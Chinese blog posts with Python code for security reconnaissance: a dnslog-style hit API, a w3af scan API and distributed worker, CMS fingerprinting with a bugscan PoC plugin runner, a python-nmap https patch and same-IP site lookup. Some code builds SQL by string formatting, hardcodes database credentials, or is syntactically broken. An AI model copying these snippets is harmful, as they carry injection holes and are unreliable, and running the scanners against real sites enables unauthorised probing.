                "id from logview_user where udomain = {udomain}) and path like '%{hash}%'".format(udomain=udomain,hash=hashstr)
        logging.info(sql)
        #excute.sql
    return result



其实意淫而已。不熟悉django.还在泪奔中。真特么的狗日的chrome的未知bug。动方向键就奔溃。


大约完毕了,以后有bug再说

def api(request, logtype, udomain, hashstr):  
    import json                                         
    result = None
    re_result =                                                                              
    host = "%s.%s." % (hashstr, udomain)                                                               
    if logtype == 'web':                                                                               
        res = WebLog.objects.all().filter(path__contains=hashstr)                                                                                                                  
        if len(res) > 0:                                                                               
            for rr in res:
                result = dict(
                    time= str(rr.log_time),
                    ipaddr = rr.remote_addr,
                    ua = rr.http_user_agent,
                    path = rr.path
                )                                                                     
                re_result.append(result)

    elif logtype == 'dns':      
        res = DNSLog.objects.all().filter(host__contains=host)     
        if len(res) > 0:
            for rr in res:
                result = dict(
                    time = str(rr.log_time),
                    host = rr.host
                    )
                re_result.append(result)

    else:
        return HttpResponseRedirect('/')
    return render(request, 'api.html', {'apistatus': json.dumps(re_result)})

About w3af_api

发布时间:November 23, 2016 // 分类:工作日志,开发笔记,运维工作,linux,代码学习,python,生活琐事 // No Comments

今天看到了一个saas产品,和作者聊了下,发现是基于w3af_api来实现的。然后自己补充了其他的类型.感觉很厉害的样子。于是跑过来看了下w3af。相关的文档在这里

w3af算的上是老牌的东西了。反正我是比较少用的,总是感觉效果没有理想的那么好。比如它的爬虫模块太久没有更新了.导致现在出现的很多动态脚本的结果没发准确抓取到。对比下

- http://testphp.acunetix.com/
- http://testphp.acunetix.com/AJAX/
- http://testphp.acunetix.com/AJAX/index.php
- http://testphp.acunetix.com/AJAX/styles.css
- http://testphp.acunetix.com/Flash/
- http://testphp.acunetix.com/Flash/add.fla
- http://testphp.acunetix.com/Flash/add.swf
- http://testphp.acunetix.com/Mod_Rewrite_Shop/
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/1.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/2.jpg
- http://testphp.acunetix.com/Mod_Rewrite_Shop/images/3.jpg
- http://testphp.acunetix.com/artists.php
- http://testphp.acunetix.com/cart.php
- http://testphp.acunetix.com/categories.php
- http://testphp.acunetix.com/disclaimer.php
- http://testphp.acunetix.com/guestbook.php
- http://testphp.acunetix.com/hpp/
- http://testphp.acunetix.com/hpp/params.php
- http://testphp.acunetix.com/images/logo.gif
- http://testphp.acunetix.com/images/remark.gif
- http://testphp.acunetix.com/index.php
- http://testphp.acunetix.com/listproducts.php
- http://testphp.acunetix.com/login.php
- http://testphp.acunetix.com/product.php
- http://testphp.acunetix.com/redir.php
- http://testphp.acunetix.com/search.php
- http://testphp.acunetix.com/secured/
- http://testphp.acunetix.com/secured/newuser.php
- http://testphp.acunetix.com/secured/style.css
- http://testphp.acunetix.com/showimage.php
- http://testphp.acunetix.com/signup.php
- http://testphp.acunetix.com/style.css
- http://testphp.acunetix.com/userinfo.php

这个是它抓取到的。然后自己前几天琢磨的crawl抓到的【在抓取前先fuzz了dir。所以基本满足需求】

主题不在这边。主要是针对w3af_api。关于它的文档可以看这边。简答的描述下

1.启动,主要是两个方式,一个是直接运行

$ ./w3af_api
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

另外一个是docker

$ cd extras/docker/scripts/
$ ./w3af_api_docker
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

2.认证。可以自行更换密码的。密码默认的加密方式是sha512sum。

生成密码

$ echo -n "secret" | sha512sum
bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2  -

$ ./w3af_api -p "bd2b1aaf7ef4f09be9f52ce2d8d599674d81aa9d6a4421696dc4d93dd0619d682ce56b4d64a9ef097761ced99e0f67265b5f76085e5b0ee7ca4696b2ad6fe2b2"
 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)

也可以把账户密码等信息写入yml配置文件来加载启动。

3.api使用方式

开始一个新的扫描 [POST] /scans/
查看扫描状态 GET /scans/0/status
获取相关的漏洞信息使用 GET /scan/kb/
删除相关的信息  DELETE /scans/0/
获取扫描信息  GET  /scans/
暂停扫描  GET /scans/0/pause
停止扫描  GET /scans/0/stop
查看扫描日志  GET /scans/0/log

实际栗子来尝试一次扫描

import requests
import json

data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': ['http://testphp.acunetix.com']}

response = requests.post('http://127.0.0.1:5000/scans/',
                         data=json.dumps(data),
                         headers={'content-type': 'application/json'})
                         
print response.text
scan_profile    必须包含的内容w3af扫描配置文件(文件名)
target_urls      w3af要进行爬虫的url列表

查看扫描状态

查看扫描状态

查看相关的漏洞信息

具体某个漏洞的信息

{
  "attributes": {
    "db": "MySQL database",
    "error": "mysql_"
  },
  "cwe_ids": [
    "89"
  ],
  "cwe_urls": [
    "https://cwe.mitre.org/data/definitions/89.html"
  ],
  "desc": "SQL injection in a MySQL database was found at: \"http://testphp.acunetix.com/userinfo.php\", using HTTP method POST. The sent post-data was: \"uname=a%27b%22c%27d%22&pass=FrAmE30.\" which modifies the \"uname\" parameter.",
  "fix_effort": 50,
  "fix_guidance": "The only proven method to prevent against SQL injection attacks while still maintaining full application functionality is to use parameterized queries (also known as prepared statements). When utilising this method of querying the database, any value supplied by the client will be handled as a string value rather than part of the SQL query.\n\nAdditionally, when utilising parameterized queries, the database engine will automatically check to make sure the string being used matches that of the column. For example, the database engine will check that the user supplied input is an integer if the database column is configured to contain integers.",
  "highlight": [
    "mysql_"
  ],
  "href": "/scans/0/kb/29",
  "id": 29,
  "long_description": "Due to the requirement for dynamic content of today's web applications, many rely on a database backend to store data that will be called upon and processed by the web application (or other programs). Web applications retrieve data from the database by using Structured Query Language (SQL) queries.\n\nTo meet demands of many developers, database servers (such as MSSQL, MySQL, Oracle etc.) have additional built-in functionality that can allow extensive control of the database and interaction with the host operating system itself. An SQL injection occurs when a value originating from the client's request is used within a SQL query without prior sanitisation. This could allow cyber-criminals to execute arbitrary SQL code and steal data or use the additional functionality of the database server to take control of more server components.\n\nThe successful exploitation of a SQL injection can be devastating to an organisation and is one of the most commonly exploited web application vulnerabilities.\n\nThis injection was detected as the tool was able to cause the server to respond to the request with a database related error.",
  "name": "SQL injection",
  "owasp_top_10_references": [
    {
      "link": "https://www.owasp.org/index.php/Top_10_2013-A1",
      "owasp_version": "2013",
      "risk_id": 1
    }
  ],
  "plugin_name": "sqli",
  "references": [
    {
      "title": "SecuriTeam",
      "url": "http://www.securiteam.com/securityreviews/5DP0N1P76E.html"
    },
    {
      "title": "Wikipedia",
      "url": "http://en.wikipedia.org/wiki/SQL_injection"
    },
    {
      "title": "OWASP",
      "url": "https://www.owasp.org/index.php/SQL_Injection"
    },
    {
      "title": "WASC",
      "url": "http://projects.webappsec.org/w/page/13246963/SQL%20Injection"
    },
    {
      "title": "W3 Schools",
      "url": "http://www.w3schools.com/sql/sql_injection.asp"
    },
    {
      "title": "UnixWiz",
      "url": "http://unixwiz.net/techtips/sql-injection.html"
    }
  ],
  "response_ids": [
    1494
  ],
  "severity": "High",
  "tags": [
    "web",
    "sql",
    "injection",
    "database",
    "error"
  ],
  "traffic_hrefs": [
    "/scans/0/traffic/1494"
  ],
  "uniq_id": "82f91e8c-759b-43b9-82cb-59ff9a38a836",
  "url": "http://testphp.acunetix.com/userinfo.php",
  "var": "uname",
  "vulndb_id": 45,
  "wasc_ids": [],
  "wasc_urls": []
}

感觉有这些差不多了。可以开始扫描,暂停,停止,删除。还能获取到具体的某个漏洞细节以及修复方案。加上api独有的特效,是可以做分布式的.

import pika
import requests
import json
import sys
import time
import sqlalchemy as db
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
import os

# database stuffs
Base = declarative_base()

# scan
class Scan(Base):
    __tablename__ = 'scans'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer)
    description = db.Column(db.Text)
    target_url = db.Column(db.String(128))
    start_time = db.Column(db.Time)
    scan_time = db.Column(db.Time, nullable=True)
    profile = db.Column(db.String(32))
    status = db.Column(db.String(32))
    deleted = db.Column(db.Boolean, default=False)
    run_instance = db.Column(db.Unicode(128))
    num_vulns = db.Column(db.Integer)
    vulns = db.orm.relationship("Vulnerability", back_populates="scan")
    user_id = db.Column(db.String(40))

    def __repr__(self):
        return '<Scan %d>' % self.id

# vuln
class Vulnerability(Base):
    __tablename__ = 'vulns'
    id = db.Column(db.Integer, primary_key = True)
    relative_id = db.Column(db.Integer) # relative to scans
    stored_json = db.Column(db.Text) # inefficient, might fix later
    deleted = db.Column(db.Boolean, default=False)
    false_positive = db.Column(db.Boolean, default=False)
    scan_id = db.Column(db.Integer, db.ForeignKey('scans.id'))
    scan = db.orm.relationship("Scan", back_populates="vulns")

    def __init__(self, id, json, scan_id):
        self.relative_id = id
        self.stored_json = json
        self.scan_id = scan_id

    def __repr__(self):
        return '<Vuln %d>' % self.id

engine = db.create_engine(os.environ.get('SQLALCHEMY_CONN_STRING'))
Session = sessionmaker(bind=engine)
sess = Session()

credentials = pika.PlainCredentials(os.environ.get('TASKQUEUE_USER'), os.environ.get('TASKQUEUE_PASS'))
con = pika.BlockingConnection(pika.ConnectionParameters(host=os.environ.get('TASKQUEUE_HOST'),credentials=credentials))

channelTask = con.channel()
channelTask.queue_declare(queue='task', durable=True)

channelResult = con.channel()
channelResult.queue_declare(queue='result')

# URL to w3af REST API interface instance
server = sys.argv[1]

vul_cnt = 0

def freeServer(sv, href):
    r = requests.delete(sv + href)
    print r.text

def isFree(sv):
    r = requests.get(sv + '/scans/')
    print r.text
    items = json.loads(r.text)['items']
    if len(items) == 0:
        return True
    # number of items > 0
    item = items[0]
    if item['status'] == 'Stopped':
        freeServer(sv, item['href'])
        return True
    return False

def sendTaskDone(server, href):
    data = {}
    data['server'] = server
    data['href'] = href
    message = json.dumps(data)
    channelResult.basic_publish(exchange='',
                        routing_key='result',
                        body=message)

def scann(target):
    data = {'scan_profile': file('../core/w3af/profiles/full_audit.pw3af').read(),
        'target_urls': [target]}
    response = requests.post(server + '/scans/',
                        data=json.dumps(data),
                        headers={'content-type': 'application/json'})

    print response.status_code
    print response.data
    print response.headers

def getVul(sv, href):
    r = requests.get(sv + href)
    #db.insert(r.text)

def getVulsList(sv, href):
    global vul_cnt
    r = requests.get(sv + href + 'kb')
    vuls = json.loads(r.text)['items']
    l = len(vuls)
    if l > vuls_cnt:
        for vul in vuls:
            if vul['id'] >= vul_cnt:
                getVul(sv, vul['href'])
    vul_cnt = l
        
# on receiving message
def callback(ch, method, properties, body):
    print('Get message %s', body)
    task = json.loads(body)
    scann(task['target'])
    task_done = False
    time.sleep(1)
    step = 0
    last_vuln_len = 0
    sv = server
    scan = sess.query(Scan).filter_by(id=task['scan_id']).first()
    # tell gateway server that the task is loaded on this instance
    scan.run_instance = server
    while True:
        # update scan status; check if freed
        list_scans = json.loads(requests.get(sv + '/scans/').text)['items'] # currently just 1
        if (len(list_scans) == 0): # freed
            break
        currentpath = list_scans[0]['href']
        # update vuln list
        r = requests.get(sv + currentpath + '/kb/')
        items = json.loads(r.text)['items'] 
        for i in xrange(last_vuln_len, len(items)):
            v = Vulnerability(i+1, requests.get(sv + items[i]['href']).text, task['scan_id'])
            sess.add(v)
            sess.commit()
            scan.num_vulns += 1
        last_vuln_len = len(items)
        scan.status = list_scans[0]['status']
        sess.commit()
        if scan.status == 'Stopped' and not task_done:
            task_done = True
            requests.delete(sv + currentpath)
        step += 1
        if step == 9:
            con.process_data_events() # MQ heartbeat
            step = 0
        time.sleep(5) # avoid over consumption
    # TODO: send mails to list when the scan is stopped or completed
    print 'DOne'
    ch.basic_ack(delivery_tag=method.delivery_tag)
#print getServerStatus(server)


channelTask.basic_qos(prefetch_count=1)
channelTask.basic_consume(callback, queue='task')

print '[*] Waiting for message'

channelTask.start_consuming()

 

在线cms识别以及bugscan插件调用

发布时间:October 23, 2016 // 分类:开发笔记,linux,python,windows // No Comments

想着自己搞的话估计是比较符合自己的需求。但是问题就是太耗时了,估计覆盖面也不广泛。

恰逢遇到了http://whatweb.bugscaner.com/这个网站,发现它的覆盖面还是不错的。常见的cms都整合过去了。测试了几个发现误报率还是在可以接受的范围内.于是自动化。一个简单的demo.缺点是只能访问http一类的.https的不支持。它提交的时候会自动去掉http|https://

#!/usr/bin/python
import re
import json
import requests



def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        respone = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(respone.status_code)==200:
            result = json.loads(respone.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"
        
if __name__ == '__main__':
    import sys
    url = sys.avg[1]
    print whatcms(url)

无法识别的自动判断为www。既然都可以完美搞定了。接下来开始整合插件.我的想法是先分类.读取文件内容中的service。然后再把文件名称和servvice存进数据库.方便以后调用。简单的来个小脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os,glob
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1.识别具体的cms
2.从数据库获取cms--如果没有获取到考虑全部便利
3.输出结果
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)

for filename in glob.glob(r'./bugscannew/*.py'):
    insert(filename)

然后思考下怎么调用这个具体的插件来进行判断。其实想了好久。直到前不久空着有空看了pocscan。发现这个方式不错.把文件加入到pypath中.然后from xxx import audit 然后就完美解决这个问题了.

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret

暂时没完美调用的方式.简单的贴个demo

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re,os
import imp,sys
import time,json
import logging,glob
import requests
from mysql_class import MySQL
"""
logging.basicConfig(
    level=logging.DEBUG,
    format="[%(asctime)s] %(levelname)s: %(message)s")
"""
"""
1.识别具体的cms
2.从数据库获取cms--如果没有获取到考虑全部便利
3.输出结果
"""
def timestamp():
    return str(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))

"""
DROP TABLE IF EXISTS `bugscan`;
CREATE TABLE `bugscan` (
    `id` int(11) NOT NULL AUTO_INCREMENT,
    `service` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `filename` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    `time` varchar(256) COLLATE utf8_bin DEFAULT NULL,
    PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=1 DEFAULT CHARSET=utf8 COLLATE=utf8_bin;
SET FOREIGN_KEY_CHECKS = 1;
"""
dbconfig = {'host':'127.0.0.1','port': 3306,'user':'root','passwd':'root123','db':'proscan','charset':'utf8'}
db = MySQL(dbconfig)

def insert(filename):
    file_data = open(filename,'rb').read()
    service = re.findall(r"if service.*==(.*?):",file_data)
    if len(service)>0:
        servi = service[0].replace("'", "").replace("\"", "").replace(" ", "")
        
        sqlInsert = "insert into `bugscan`(id,service,filename,time) values ('','%s','%s','%s');" % (str(servi),str(filename.replace('./bugscannew/','')),str(timestamp()))
        print sqlInsert
        #db.query(sql=sqlInsert)
        #print servi,filename

def check(service,url):
    if service == 'www':
        sqlsearch = "select  filename from  `bugscan` where service = '%s'" %(service)
    elif service != 'www':
        sqlsearch = "select  filename from  `bugscan` where service = 'www' or service = '%s'" %(service)
    print sqlsearch 
    if int(db.query(sql=sqlsearch))>0:
        result = db.fetchAllRows()
        for row in result:
            #return result
            for colum in row:
                colum = colum.replace(".py","")
                import_poc(colum,url)

def import_poc(pyfile,url):
    poc_path = os.getcwd()+"/bugscannew/"
    path = poc_path + pyfile + ".py"
    filename = path.split("/")[-1].split(".py")[0]
    sys.path.append(poc_path)
    poc0 = imp.load_source('audit', path)
    audit_function = poc0.audit
    from dummy import *
    audit_function.func_globals.update(locals())
    ret = audit_function(url)
    if ret is not None and 'None' not in ret:
        #print ret
        return ret

def whatcms(url):
    headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
        "Referer":"http://whatweb.bugscaner.com/look/",
        }
    """
    try:
        res = requests.get('http://whatweb.bugscaner.com/look/',timeout=60, verify=False)
        if res.status_code==200:
            hashes = re.findall(r'value="(.*?)" name="hash" id="hash"',res.content)[0]
    except Exception as e:
        print str(e)
        return False
    """
    data = "url=%s&hash=0eca8914342fc63f5a2ef5246b7a3b14_7289fd8cf7f420f594ac165e475f1479"%(url)
    try:
        respone = requests.post("http://whatweb.bugscaner.com/what/",data=data,headers=headers,timeout=60, verify=False)
        if int(respone.status_code)==200:
            result = json.loads(respone.content)
            if len(result["cms"])>0:
                return result["cms"]
            else:
                return "www"
    except Exception as e:
        print str(e)
        return "www"
        
if __name__ == '__main__':
    #for filename in glob.glob(r'./bugscannew/*.py'):
    #   insert(filename)
    url = "http://0day5.com/"
    print check(whatcms(url),url)

其实还有纰漏。比如在调用那块可以考虑下采用多线程来加快速度.还有就是可能出现如果cms无法识别出来。结果肯定不准确。如果全部load进来fuzz一次太耗时了。

得到琦神的demo。貌似更暴力,全加载fuzz一次

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# papapa.py
import re
import socket
import sys
import os
import urlparse
import time
from dummy.common import *
import util
from dummy import *
import importlib
import threading
import Queue as que


class Worker(threading.Thread):  # 处理工作请求
    def __init__(self, workQueue, resultQueue, **kwds):
        threading.Thread.__init__(self, **kwds)
        self.setDaemon(True)
        self.workQueue = workQueue
        self.resultQueue = resultQueue

    def run(self):
        while 1:
            try:
                callable, args, kwds = self.workQueue.get(False)  # get task
                res = callable(*args, **kwds)
                self.resultQueue.put(res)  # put result
            except que.Empty:
                break


class WorkManager:  # 线程池管理,创建
    def __init__(self, num_of_workers=10):
        self.workQueue = que.Queue()  # 请求队列
        self.resultQueue = que.Queue()  # 输出结果的队列
        self.workers = []
        self._recruitThreads(num_of_workers)

    def _recruitThreads(self, num_of_workers):
        for i in range(num_of_workers):
            worker = Worker(self.workQueue, self.resultQueue)  # 创建工作线程
            self.workers.append(worker)  # 加入到线程队列

    def start(self):
        for w in self.workers:
            w.start()

    def wait_for_complete(self):
        while len(self.workers):
            worker = self.workers.pop()  # 从池中取出一个线程处理请求
            worker.join()
            if worker.isAlive() and not self.workQueue.empty():
                self.workers.append(worker)  # 重新加入线程池中
        #logging.info('All jobs were complete.')

    def add_job(self, callable, *args, **kwds):
        self.workQueue.put((callable, args, kwds))  # 向工作队列中加入请求

    def get_result(self, *args, **kwds):
        return self.resultQueue.get(*args, **kwds)
"""
lst=os.listdir(os.getcwd())
pocList =(','.join(c.strip('.py') for c in lst if os.path.isfile(c) and c.endswith('.py'))).split(',')
for line in pocList:
    try:
        #print line
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit('http://0day5.com')
    except Exception as e:
        print line,e
"""

def bugscan(line,url):
    #print line,url
    try:
        xxoo = importlib.import_module(line)
        xxoo.curl = miniCurl.Curl()
        xxoo.security_hole = security_hole
        xxoo.task_push = task_push
        xxoo.util =util
        xxoo.security_warning = security_warning
        xxoo.security_note = security_note
        xxoo.security_info = security_info
        xxoo.time = time
        xxoo.audit(url)
    except Exception as e:
        #print line,e
        pass

def main(url):
    wm = WorkManager(20)
    lst=os.listdir(os.getcwd())
    pocList =(','.join(c.strip('.py') for c in lst if os.path.isfile(c) and c.endswith('.py'))).split(',')
    for line in pocList:
        if 'apa' not in line:
    wm.start()
    wm.wait_for_complete()
start = time.time()
main('http://0day5.com/')
print time.time()-start

准确率堪忧啊,仅供参考

使用python-nmap不出https踩到的坑

发布时间:September 1, 2016 // 分类:工作日志,运维工作,开发笔记,linux,windows,python,生活琐事 // No Comments

今天在使用python-nmap来进行扫描入库的时候发现https端口硬生生的给判断成了http

仔细测试了好几次都是这样子。后来果断的不服气,仔细看了下扫描的参数。发现python-nmap调用的时候会强制加上-ox -这个参数

正常扫描是

nmap 45.33.49.119 -p T:443 -Pn -sV --script=banner

然而经过python-nmap以后就是

nmap -oX - 45.33.49.119 -p T:443 -Pn -sV --script=banner
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<?xml-stylesheet href="file:///usr/local/bin/../share/nmap/nmap.xsl" type="text/xsl"?>
<!-- Nmap 7.12 scan initiated Thu Sep  1 00:02:07 2016 as: nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119 -->
<nmaprun scanner="nmap" args="nmap -oX - -p T:443 -Pn -sV -&#45;script=banner 45.33.49.119" start="1472659327" startstr="Thu Sep  1 00:02:07 2016" version="7.12" xmloutputversion="1.04">
<scaninfo type="connect" protocol="tcp" numservices="1" services="443"/>
<verbose level="0"/>
<debugging level="0"/>
<host starttime="1472659328" endtime="1472659364"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="45.33.49.119" addrtype="ipv4"/>
<hostnames>
<hostname name="ack.nmap.org" type="PTR"/>
</hostnames>
<ports><port protocol="tcp" portid="443"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="http" product="Apache httpd" version="2.4.6" extrainfo="(CentOS)" tunnel="ssl" method="probed" conf="10"><cpe>cpe:/a:apache:http_server:2.4.6</cpe></service><script id="http-server-header" output="Apache/2.4.6 (CentOS)"><elem>Apache/2.4.6 (CentOS)</elem>
</script></port>
</ports>
<times srtt="191238" rttvar="191238" to="956190"/>
</host>
<runstats><finished time="1472659364" timestr="Thu Sep  1 00:02:44 2016" elapsed="36.65" summary="Nmap done at Thu Sep  1 00:02:44 2016; 1 IP address (1 host up) scanned in 36.65 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>

经过格式化以后看到的内容是

其中的一个参数tunnel.但是看了下https://bitbucket.org/xael/python-nmap/raw/8ed37a2ac20d6ef26ead60d36f739f4679fcdc3e/nmap/nmap.py这里的内容。发现没有与之关联的。

for dport in dhost.findall('ports/port'):
                # protocol
                proto = dport.get('protocol')
                # port number converted as integer
                port =  int(dport.get('portid'))
                # state of the port
                state = dport.find('state').get('state')
                # reason
                reason = dport.find('state').get('reason')
                # name, product, version, extra info and conf if any
                name = product = version = extrainfo = conf = cpe = ''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'cpe': cpe}

试想下如果把name以及tunnel取出来同时匹配不就好了。于是对此进行修改。410-440行

                name = product = version = extrainfo = conf = cpe = tunnel =''
                for dname in dport.findall('service'):
                    name = dname.get('name')
                    if dname.get('product'):
                        product = dname.get('product')
                    if dname.get('version'):
                        version = dname.get('version')
                    if dname.get('extrainfo'):
                        extrainfo = dname.get('extrainfo')
                    if dname.get('conf'):
                        conf = dname.get('conf')
                    if dname.get('tunnel'):
                        tunnel = dname.get('tunnel')

                    for dcpe in dname.findall('cpe'):
                        cpe = dcpe.text
                # store everything
                if not proto in list(scan_result['scan'][host].keys()):
                    scan_result['scan'][host][proto] = {}

                scan_result['scan'][host][proto][port] = {'state': state,
                                                          'reason': reason,
                                                          'name': name,
                                                          'product': product,
                                                          'version': version,
                                                          'extrainfo': extrainfo,
                                                          'conf': conf,
                                                          'tunnel':tunnel,
                                                          'cpe': cpe}

还有在654-670行里面增加我们添加的tunnel

        csv_ouput = csv.writer(fd, delimiter=';')
        csv_header = [
            'host',
            'hostname',
            'hostname_type',
            'protocol',
            'port',
            'name',
            'state',
            'product',
            'extrainfo',
            'reason',
            'version',
            'conf',
            'tunnel',
            'cpe'
            ]

然后我们import这个文件。在获取的内容里面进行判断.如果namehttp的同时tunnelssl,则判断为https

        for targetHost in scanner.all_hosts():
            if scanner[targetHost].state() == 'up' and scanner[targetHost]['tcp']:
                for targetport in scanner[targetHost]['tcp']:
                    #print(scanner[targetHost]['tcp'][int(targetport)])
                    if scanner[targetHost]['tcp'][int(targetport)]['state'] == 'open' and scanner[targetHost]['tcp'][int(targetport)]['product']!='tcpwrapped':
                        if scanner[targetHost]['tcp'][int(targetport)]['name']=='http' and scanner[targetHost]['tcp'][int(targetport)]['tunnel'] == 'ssl':
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = 'https'
                        else:
                            scanner[targetHost]['tcp'][int(targetport)]['name'] = scanner[targetHost]['tcp'][int(targetport)]['name']
                        print(domain+'\t'+targetHosts+'\t'+str(targetport) + '\t' + scanner[targetHost]['tcp'][int(targetport)]['name'] + '\t' + scanner[targetHost]['tcp'][int(targetport)]['product']+scanner[targetHost]['tcp'][int(targetport)]['version'])
                        #if scanner[targetHost]['tcp'][int(targetport)]['name'] in ["https","http"]:

改造后的文件扫描结果

python 旁站查询

发布时间:July 30, 2016 // 分类:开发笔记,工作日志,代码学习,linux,python,windows // No Comments

旁站查询来源:

效果图如下

#!/usr/bin/env python
#encoding: utf-8
import re
import sys
import json
import time
import requests
import urllib
import requests.packages.urllib3
from multiprocessing import Pool
from BeautifulSoup import BeautifulSoup
requests.packages.urllib3.disable_warnings()

headers = {'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20'}

def links_ip(host):   
    '''
    查询同IP网站
    '''
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        source = requests.get('http://i.links.cn/sameip/' + host + '.html', headers=headers,verify=False)
        soup = BeautifulSoup(source.text)
        divs = soup.findAll(style="word-break:break-all")
        
        if divs == []: #抓取结果为空
            print 'Sorry! Not found!'
            return ip2hosts 
        for div in divs:
            #print div.a.string
            ip2hosts.append(div.a.string)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts

def ip2host_get(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    try:
        req=requests.get('http://www.ip2hosts.com/search.php?ip='+str(host), headers=headers,verify=False)
        src=req.content
        if src.find('result') != -1:
            result = json.loads(src)['result']
            ip = json.loads(src)['ip']
            if len(result)>0:
                for item in result:
                    if len(item)>0:
                        #log(scan_type,host,port,str(item))
                        ip2hosts.append(item)
    except Exception, e:
        print str(e)
        return ip2hosts
    return ip2hosts


def filter(host):
    '''
        打不开的网站...
    '''
    try:
        response = requests.get(host, headers=headers ,verify=False)
        server = response.headers['Server']
        title = re.findall(r'<title>(.*?)</title>',response.content)[0]
    except Exception,e:
        #print "%s" % str(e)
        #print host
        pass
    else:
        print host,server

def aizhan(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
    regexp = r'''<a href="[^']+?([^']+?)/" rel="nofollow" target="_blank">\1</a>'''
    regexp_next = r'''<a href="http://dns.aizhan.com/[^/]+?/%d/">%d</a>'''
    url = 'http://dns.aizhan.com/%s/%d/'

    page = 1
    while True:
        if page > 2:
            time.sleep(1)   #防止拒绝访问
        req = requests.get(url % (host , page) ,headers=headers ,verify=False)
        try:
            html = req.content.decode('utf-8')  #取得页面
            if req.status_code == 400:
                break
        except Exception as e:
            print str(e)
            pass
        for site in re.findall(regexp , html):
            ip2hosts.append("http://"+site)
        if re.search(regexp_next % (page+1 , page+1) , html) is None:
            return ip2hosts
            break
        page += 1

    return ip2hosts

def chinaz(host):
    ip2hosts = []
    ip2hosts.append("http://"+host)
